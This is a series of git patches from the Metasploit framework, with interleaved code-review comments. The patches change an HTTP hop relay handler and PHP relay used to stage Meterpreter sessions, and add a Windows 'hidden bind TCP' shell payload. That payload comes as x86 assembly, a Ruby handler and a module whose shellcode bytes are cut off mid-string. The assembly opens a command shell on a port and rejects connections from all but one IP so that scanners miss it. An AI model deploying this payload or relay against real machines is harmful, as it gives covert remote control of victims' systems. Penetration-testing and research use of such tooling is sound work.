if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) @@ -135,7 +142,11 @@ module ReverseHopHttp # Stops the handler and monitoring thread # def stop_handler - @finish = true + # stop_handler is called like 3 times, don't decrement refcount unless we're still running + if @running + ReverseHopHttp.hop_handlers[full_uri].refs -= 1 + @running = false + end end # From a83ca2b8d6170a334525c88b6af1eac59eaa7783 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Wed, 8 Jan 2014 17:37:56 -0600 Subject: [PATCH 024/853] Ghost sessions fix, fewer selfies, cleaner code --- lib/msf/core/handler/reverse_hop_http.rb | 30 ++++++++++++++---------- 1 file changed, 17 insertions(+), 13 deletions(-) 
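Review bot: When the hop already has an entry, `start_handler` bumps `refs` and returns without checking that the owning handler's `monitor_thread` is still running. No rescue is visible in the thread block in these hunks, so if it ever exits on an exception the `hop_handlers` entry stays behind and every later handler for that hop joins a monitor that no longer polls; before this change the same state at least raised an error. I would test liveness before joining, e.g. `owner = ReverseHopHttp.hop_handlers[full_uri]` and `if owner && owner.monitor_thread && owner.monitor_thread.alive?`, and fall through to take ownership otherwise. `stop_handler` in the next hunk looks up the same entry and would raise on nil if it is gone.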
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index d9911b12ec..e336959a5b 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -27,6 +27,7 @@ module ReverseHopHttp class << self; attr_accessor :hop_handlers end attr_accessor :monitor_thread # :nodoc: attr_accessor :handlers # :nodoc: + attr_accessor :closed_handlers # :nodoc: attr_accessor :mclient # :nodoc: attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: @@ -57,6 +58,7 @@ module ReverseHopHttp # def setup_handler self.handlers = {} + self.closed_handlers = {} end # @@ -95,7 +97,7 @@ module ReverseHopHttp delay = delay + 1 if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) res = hop_http.mclient.send_recv(crequest) # send poll to the hop - next if res == nil + next if res.nil? if res.error print_error(res.error) next @@ -116,7 +118,7 @@ module ReverseHopHttp pack.body = received hop_http.current_url = urlpath hop_http.handlers[urlpath].call(hop_http, pack) - else + elsif !closed_handlers.include? urlpath #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session @@ -154,14 +156,15 @@ module ReverseHopHttp # def add_resource(res, opts={}) self.handlers[res] = opts['Proc'] - start_handler if self.monitor_thread == nil + start_handler if monitor_thread.nil? end # # Removes a resource. # def remove_resource(res) - self.handlers.delete(res) + handlers.delete(res) + closed_handlers[res] = true end # 
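Review bot: The new `elsif !closed_handlers.include? urlpath` calls `closed_handlers` on the block's implicit `self`, while every neighbouring line goes through the `hop_http` block parameter. They are the same object here because `self` is what gets passed to `spawn`, but the mix is easy to break in a refactor; `elsif !hop_http.closed_handlers.include?(urlpath)` matches the rest of the block. Separately, `remove_resource` adds to `closed_handlers` and nothing in these hunks ever removes an entry, so the hash grows for the life of the handler.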
@@ -175,14 +178,14 @@ module ReverseHopHttp # def send_response(resp) if not resp.body.empty? - crequest = self.mclient.request_raw( + crequest = mclient.request_raw( 'method' => 'POST', - 'uri' => self.control, + 'uri' => control, 'data' => resp.body, - 'headers' => {'X-urlfrag' => self.current_url} + 'headers' => {'X-urlfrag' => current_url} ) # if receiving POST data, hop does not send back data, so we can stop here - self.mclient.send_recv(crequest) + mclient.send_recv(crequest) end end @@ -207,7 +210,8 @@ module ReverseHopHttp # Returns the URL of the remote hop end # def peerinfo - URI(full_uri).host + uri = URI(full_uri) + "#{uri.host}:#{uri.port}" end # @@ -231,7 +235,7 @@ module ReverseHopHttp url = full_uri + conn_id + "/\x00" print_status("Preparing stage for next session #{conn_id}") - blob = self.stage_payload + blob = stage_payload # Replace the user agent string with our option i = blob.index("METERPRETER_UA\x00") @@ -270,15 +274,15 @@ module ReverseHopHttp blob = encode_stage(blob) #send up - crequest = self.mclient.request_raw( + crequest = mclient.request_raw( 'method' => 'POST', 'uri' => control, 'data' => blob, 'headers' => {'X-init' => 'true'} ) - res = self.mclient.send_recv(crequest) + res = mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res != nil && res.error + print_error(res.error) if !res.nil? && res.error #return conn info [conn_id, url] From b0d2949f9a4c5fe36a9180c9eb3493a653cb4244 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Wed, 8 Jan 2014 17:58:42 -0600 Subject: [PATCH 025/853] Ensure no race conditions on handlers Configurable WfsDelay --- lib/msf/core/handler/reverse_hop_http.rb | 21 +++++++++++++------ .../stagers/windows/reverse_hop_http.rb | 8 +------ 2 files changed, 16 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index e336959a5b..2fb807e801 100644 
--- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -32,6 +32,7 @@ module ReverseHopHttp attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: attr_accessor :refs # :nodoc: + attr_accessor :lock # :nodoc: # # Keeps track of what hops have active handlers @@ -59,14 +60,16 @@ module ReverseHopHttp def setup_handler self.handlers = {} self.closed_handlers = {} + self.lock = Mutex.new end # # Starts the handler along with a monitoring thread to handle data transfer # def start_handler + # Our HTTP client and URL for talking to the hop uri = URI(full_uri) - # Our HTTP client for talking to the hop + self.control = "#{uri.request_uri}control" self.mclient = Rex::Proto::Http::Client.new( uri.host, uri.port, @@ -87,9 +90,7 @@ module ReverseHopHttp ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| - control = "#{uri.request_uri}control" - hop_http.control = control - hop_http.send_new_stage(control) # send stage to hop + hop_http.send_new_stage # send stage to hop delay = 1 # poll delay # Continue to loop as long as at least one handler or one session is depending on us until hop_http.refs < 1 && hop_http.handlers.empty? @@ -112,13 +113,17 @@ module ReverseHopHttp urlen = received.slice!(0,4).unpack('V')[0] urlpath = received.slice!(0,urlen) + # do not want handlers to change while we dispatch this + hop_http.lock.lock #received is now the binary contents of the message if hop_http.handlers.include? urlpath pack = Rex::Proto::Http::Packet.new pack.body = received hop_http.current_url = urlpath hop_http.handlers[urlpath].call(hop_http, pack) + hop_http.lock.unlock elsif !closed_handlers.include? urlpath + hop_http.lock.unlock #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session 
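Review bot: The `hop_http.lock.lock` added before dispatch is released by a separate `unlock` in each branch, so an exception from `handlers[urlpath].call(hop_http, pack)` leaves the mutex held and the next `remove_resource` blocks forever. `Mutex#synchronize` releases on every exit path; `remove_resource`, changed in a later hunk of this commit, becomes `lock.synchronize { handlers.delete(res); closed_handlers[res] = true }`, and the dispatch can pick its branch inside a `synchronize` block. The handler proc also runs while the lock is held, so if it can reach `remove_resource` on the same thread (not visible here) Ruby raises a recursive-locking `ThreadError`. The thread block starts and ends outside this hunk.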
@@ -132,7 +137,9 @@ module ReverseHopHttp :ssl => false, }) # send new stage to hop so next inbound session will get a unique ID. - hop_http.send_new_stage(control) + hop_http.send_new_stage + else + hop_http.lock.unlock end end hop_http.monitor_thread = nil #make sure we're out @@ -163,8 +170,10 @@ module ReverseHopHttp # Removes a resource. # def remove_resource(res) + lock.lock handlers.delete(res) closed_handlers[res] = true + lock.unlock end # @@ -230,7 +239,7 @@ module ReverseHopHttp # # Generates and sends a stage up to the hop point to be ready for the next client # - def send_new_stage(control) + def send_new_stage conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) url = full_uri + conn_id + "/\x00" diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 9109738220..2332562a41 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -24,6 +24,7 @@ module Metasploit3 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHopHttp, 'Convention' => 'sockedi http', + 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Stager' => { 'Offsets' => @@ -284,11 +285,4 @@ EOS self.module_info['Stager']['Assembly'] = payload_data.to_s super end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 - end end From c0983138a097df6d1a9e1db5e9efc15bbd2ce670 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Thu, 13 Feb 2014 03:38:29 -0600 Subject: [PATCH 026/853] Fix wrapping errors on long domains. --- modules/payloads/stagers/windows/reverse_hop_http.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 2332562a41..c33cb09ba1 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb 
+++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -234,7 +234,7 @@ get_server_uri: call httpopenrequest server_uri: - db "#{Rex::Text.hexify(uri.request_uri).chomp}?/12345", 0x00 + db "#{Rex::Text.hexify(uri.request_uri, 99999).chomp}?/12345", 0x00 failure: push 0x56A2B5F0 ; hardcoded to exitprocess for size @@ -279,7 +279,7 @@ get_server_host: call internetconnect server_host: -db "#{Rex::Text.hexify(uri.host).chomp}", 0x00 +db "#{Rex::Text.hexify(uri.host, 99999).chomp}", 0x00 EOS self.module_info['Stager']['Assembly'] = payload_data.to_s From 022c52d0877ec9e0fbd28c5baaa215dbf45d977b Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Thu, 13 Feb 2014 13:42:07 -0600 Subject: [PATCH 027/853] Added bundling to handle many sessions at once. --- data/php/hop.php | 10 ++-- lib/msf/core/handler/reverse_hop_http.rb | 68 ++++++++++++------------ 2 files changed, 42 insertions(+), 36 deletions(-) diff --git a/data/php/hop.php b/data/php/hop.php index d7ab92e82c..c9f323657a 100644 --- a/data/php/hop.php +++ b/data/php/hop.php @@ -10,7 +10,7 @@ $url = $_SERVER["QUERY_STRING"]; //like /path/hop.php?/uRIcksm_lOnGidENTifIEr //Looks for a file with a name or contents prefix, if found, send it and deletes it -function findSendDelete($tempdir, $prefix){ +function findSendDelete($tempdir, $prefix, $one=true){ if($dh = opendir($tempdir)){ while(($file = readdir($dh)) !== false){ if(strpos($file, $prefix) !== 0){ @@ -18,7 +18,9 @@ function findSendDelete($tempdir, $prefix){ } readfile($tempdir."/".$file); unlink($tempdir."/".$file); - break; + if($one){ + break; + } } } } @@ -37,7 +39,7 @@ if($url === "/control"){ fwrite($f, $postdata); fclose($f); }else{ - findSendDelete($tempdir, "up_"); + findSendDelete($tempdir, "up_", false); } }else if($_SERVER['REQUEST_METHOD'] === 'POST'){ //get data 
@@ -56,6 +58,8 @@ if($url === "/control"){ $urlen = strlen($url); fwrite($f, pack('V', $urlen)); fwrite($f, $url); + $postdatalen = strlen($postdata); + fwrite($f, pack('V', $postdatalen)); fwrite($f, $postdata); fclose($f); //Initial query will be a GET and have a 12345 in it diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 2fb807e801..96478245cc 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb 
@@ -104,42 +104,44 @@ module ReverseHopHttp next end - # validate response + # validate responses, handle each message down received = res.body - next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC + until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC - # good response - delay = 0 # we're talking, speed up - urlen = received.slice!(0,4).unpack('V')[0] - urlpath = received.slice!(0,urlen) + # good response + delay = 0 # we're talking, speed up + urlen = received.slice!(0,4).unpack('V')[0] + urlpath = received.slice!(0,urlen) + datalen = received.slice!(0,4).unpack('V')[0] - # do not want handlers to change while we dispatch this - hop_http.lock.lock - #received is now the binary contents of the message - if hop_http.handlers.include? urlpath - pack = Rex::Proto::Http::Packet.new - pack.body = received - hop_http.current_url = urlpath - hop_http.handlers[urlpath].call(hop_http, pack) - hop_http.lock.unlock - elsif !closed_handlers.include? urlpath - hop_http.lock.unlock - #New session! - conn_id = urlpath.gsub("/","") - # Short-circuit the payload's handle_connection processing for create_session - # We are the dispatcher since we need to handle the comms to the hop - create_session(hop_http, { - :passive_dispatcher => self, - :conn_id => conn_id, - :url => uri.to_s + conn_id + "/\x00", - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :ssl => false, - }) - # send new stage to hop so next inbound session will get a unique ID. - hop_http.send_new_stage - else - hop_http.lock.unlock + # do not want handlers to change while we dispatch this + hop_http.lock.lock + #received now starts with the binary contents of the message + if hop_http.handlers.include? 
urlpath + pack = Rex::Proto::Http::Packet.new + pack.body = received.slice!(0,datalen) + hop_http.current_url = urlpath + hop_http.handlers[urlpath].call(hop_http, pack) + hop_http.lock.unlock + elsif !closed_handlers.include? urlpath + hop_http.lock.unlock + #New session! + conn_id = urlpath.gsub("/","") + # Short-circuit the payload's handle_connection processing for create_session + # We are the dispatcher since we need to handle the comms to the hop + create_session(hop_http, { + :passive_dispatcher => self, + :conn_id => conn_id, + :url => uri.to_s + conn_id + "/\x00", + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ssl => false, + }) + # send new stage to hop so next inbound session will get a unique ID. + hop_http.send_new_stage + else + hop_http.lock.unlock + end end end hop_http.monitor_thread = nil #make sure we're out From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 10:21:05 -0800 Subject: [PATCH 028/853] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module. --- .../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%) diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb similarity index 100% rename from modules/exploits/multi/http/myBB_GetTypeDB rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 
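Review bot: The new `until` loop trusts the two length fields it reads from the response body: `urlen` and `datalen` are passed to `slice!` without checking that that many bytes remain. On a truncated or malformed bundle `received.slice!(0,4)` returns a short or empty string, `unpack('V')[0]` yields nil and the next `slice!` raises inside the monitor loop, or a record is dispatched with a body shorter than declared. I would stop parsing as soon as a field is short, e.g. `break if datalen.nil? || received.length < datalen` after the `datalen` line, with the same check for `urlen`. Separately, `hop_http.lock.lock` is paired with explicit `unlock` calls in each branch, so an exception from `hop_http.handlers[urlpath].call` leaves the lock held; if `lock` is a Mutex, `hop_http.lock.synchronize { ... }` or an `ensure` covers that. The enclosing method starts outside the hunk.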
From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 029/853] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From b4a22aa25d0635ab9204f0f4ae1886e7da034876 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 20 Feb 2014 16:19:40 +0100 Subject: [PATCH 030/853] hidden bind shell payload --- .../x86/src/block/block_hidden_bind_tcp.asm | 90 +++++++ .../single/single_shell_hidden_bind_tcp.asm | 20 ++ lib/msf/core/handler/bind_hidden_tcp.rb | 231 ++++++++++++++++++ .../singles/windows/shell_hidden_bind_tcp.rb | 74 ++++++ 4 files changed, 415 insertions(+) create mode 100644 external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm create mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb create mode 100644 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm new file mode 100644 index 0000000000..fa8f31681a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm 
@@ -0,0 +1,90 @@ +;-----------------------------------------------------------------------------; +; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (February 2014) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. 
+ push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + xchg edi, eax ; save the socket for later, don't care about the value of eax after this + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + ; Hidden ACL Support ---------- + + push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter + push esp ; optval: pointer to the buffer in which the value for the requested option is specified + push 0x3002 ; level at which the option is defined: SOL_SOCKET + push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT + push edi ; socket descriptor + push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" ) + call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + +condition: + push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function) + call wsaaccept ; push the start of the condition function on the stack + mov eax, DWORD [esp+4] ; + mov eax, DWORD [eax+4] ; + mov eax, DWORD [eax+4] ; get the client IP returned in the stack + sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed + jz return ; if equal returns CF_ACCEPT + xor eax, eax ; If not equal, the condition function returns CF_REJECT + inc eax 
+return: + retn 0x20 ; some stack alignment needed to return to mswsock + +wsaaccept: + push ebx ; length of the sockaddr = nul + push ebx ; struct sockaddr = nul + push edi ; socket descriptor + push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) + call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) + cmp eax, -1 ; if error jump to condition function to wait for another connection + jz condition + + push edi ; push the listening socket to close + xchg edi, eax ; replace the listening socket with the new connected socket for further comms + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm new file mode 100644 index 0000000000..cb2a14a38a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 341 bytes +; Build: >build.py single_shell_bind_tcp +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_hidden_bind_tcp.asm" + ; By here we will have performed the bind_tcp connection and EDI will be out socket. +%include "./src/block/block_shell.asm" + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" 
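Review bot: The comments on the two constants pushed for `setsockopt` are swapped. Arguments are pushed right to left, so `push 0x3002` is the option name and `push 0xFFFF` is the level, which is also what the call summary `setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 )` two lines later says. I would change them to `push 0x3002 ; optname: SO_CONDITIONAL_ACCEPT` and `push 0xFFFF ; level: SOL_SOCKET`. The comment on `sub eax, 0x2101A8C0` should also say that the constant is the placeholder for AHOST (192.168.1.33, the handler's default on this page) and that the subtraction result doubles as the return value, zero being CF_ACCEPT.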
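Review bot: The header block of single_shell_hidden_bind_tcp.asm was copied from the non-hidden single and no longer describes this file. `Build: >build.py single_shell_bind_tcp` names a different source, and `Size: 341 bytes` cannot be right given that the module added in the same patch places `EXITFUNC` at offset 364. I would change the build line to `; Build: >build.py single_shell_hidden_bind_tcp`, replace the size with the measured value, and credit the hidden-ACL change as the block file's header does.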
diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb new file mode 100644 index 0000000000..59a59af8ca --- /dev/null +++ b/lib/msf/core/handler/bind_hidden_tcp.rb 
@@ -0,0 +1,231 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the Bind Hidden TCP handler. This means that +# it will attempt to connect to a remote host on a given port for a period of +# time (typically the duration of an exploit) to see if a the payload has +# started listening. This can tend to be rather verbose in terms of traffic +# and in general it is preferable to use reverse payloads. +# +### +module BindHiddenTcp + + include Msf::Handler + + # + # Returns the handler specific string representation, in this case + # 'bind_hidden_tcp'. + # + def self.handler_type + return "bind_hidden_tcp" + end + + # + # Returns the connection oriented general handler type, in this case bind. + # + def self.general_handler_type + "bind" + end + + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LPORT(4444), + OptAddress.new('RHOST', [false, 'The target address', '']), + OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), + ], Msf::Handler::BindHiddenTcp) + + self.conn_threads = [] + self.listener_threads = [] + self.listener_pairs = {} + end + + # + # Kills off the connection threads if there are any hanging around. + # + def cleanup_handler + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts a new connecting thread + # + def add_handler(opts={}) + + # Merge the updated datastore values + opts.each_pair do |k,v| + datastore[k] = v + end + + # Start a new handler + start_handler + end + + # + # Starts monitoring for an outbound connection to become established. 
+ # + def start_handler + + # Maximum number of seconds to run the handler + ctimeout = 150 + + if (exploit_config and exploit_config['active_timeout']) + ctimeout = exploit_config['active_timeout'].to_i + end + + # Take a copy of the datastore options + + ahost = datastore['AHOST'] + rhost = datastore['RHOST'] + lport = datastore['LPORT'] + + # Ignore this if one of the required options is missing + return if not ahost + return if not rhost + return if not lport + + # Only try the same host/port combination once + phash = rhost + ':' + lport.to_s + return if self.listener_pairs[phash] + self.listener_pairs[phash] = true + + # Start a new handling thread + self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { + client = nil + + print_status("Started Hidden bind handler") + + if (rhost == nil) + raise ArgumentError, + "RHOST is not defined; bind stager cannot function.", + caller + end + + stime = Time.now.to_i + + while (stime + ctimeout > Time.now.to_i) + begin + client = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => lport.to_i, + 'Proxies' => datastore['Proxies'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + rescue Rex::ConnectionRefused + # Connection refused is a-okay + rescue ::Exception + wlog("Exception caught in bind handler: #{$!.class} #{$!}") + end + + break if client + + # Wait a second before trying again + Rex::ThreadSafe.sleep(0.5) + end + + # Valid client connection? + if (client) + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. 
+ conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| + begin + handle_connection(wrap_aes_socket(client_copy)) + rescue + elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") + end + } + else + wlog("No connection received before the handler completed") + end + } + end + + def wrap_aes_socket(sock) + if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" + return sock + end + + socks = Rex::Socket::tcp_socket_pair() + socks[0].extend(Rex::Socket::Tcp) + socks[1].extend(Rex::Socket::Tcp) + + m = OpenSSL::Digest::Digest.new('md5') + m.reset + key = m.digest(datastore["AESPassword"] || "") + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c1.encrypt + c1.key=key + sock.put([0].pack('N')) + sock.put(c1.iv=c1.random_iv) + buf1 = socks[0].read(4096) + while buf1 and buf1 != "" + sock.put(c1.update(buf1)) + buf1 = socks[0].read(4096) + end + sock.close() + } + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c2.decrypt + c2.key=key + iv="" + while iv.length < 16 + iv << sock.read(16-iv.length) + end + c2.iv = iv + buf2 = sock.read(4096) + while buf2 and buf2 != "" + socks[0].put(c2.update(buf2)) + buf2 = sock.read(4096) + end + socks[0].close() + } + + return socks[1] + end + + # + # Nothing to speak of. + # + def stop_handler + # Stop the listener threads + self.listener_threads.each do |t| + t.kill + end + self.listener_threads = [] + self.listener_pairs = {} + end + +protected + + attr_accessor :conn_threads # :nodoc: + attr_accessor :listener_threads # :nodoc: + attr_accessor :listener_pairs # :nodoc: +end + +end +end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb new file mode 100644 index 0000000000..e63628d4bc --- /dev/null +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb 
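Review bot: The guard `return if not rhost` in `start_handler` does not stop on the option's declared default, because `RHOST` is registered with `''` and an empty string is truthy in Ruby; the later `if (rhost == nil)` raise is unreachable for the same reason. With the default left in place the listener thread is still spawned and, presumably, keeps retrying against an empty peer until `ctimeout` expires. I would write the guard as `return if rhost.to_s.empty?` and drop the dead `raise`. In the same loop `rescue ::Exception` also traps interrupts and exit requests; `rescue ::StandardError => e` with `wlog("Exception caught in bind handler: #{e.class} #{e}")` is sufficient there.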
@@ -0,0 +1,74 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_hidden_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', + 'Description' => 'Listen for a connection from certain IP and spawn a command shell. + The shellcode will reply with a RST packet if the connection is not + comming from the IP defined in AHOST. This way the socket will appear + as "closed" helping us to keep our shellcode hidden from scanning tools.', + 'Author' => + [ + 'vlad902', # original payload module (single_shell_bind_tcp) + 'sd', # original payload module (single_shell_bind_tcp) + 'Borja Merino ' # Add Hidden ACL functionality + ], + 'License' => MSF_LICENSE, + 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindHiddenTcp, + 'Session' => Msf::Sessions::CommandShell, + 'Payload' => + { + 'Offsets' => + { + 'LPORT' => [ 200, 'n' ], + 'AHOST' => [ 262, 'ADDR' ], + 'EXITFUNC' => [ 364, 'V' ], + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + + 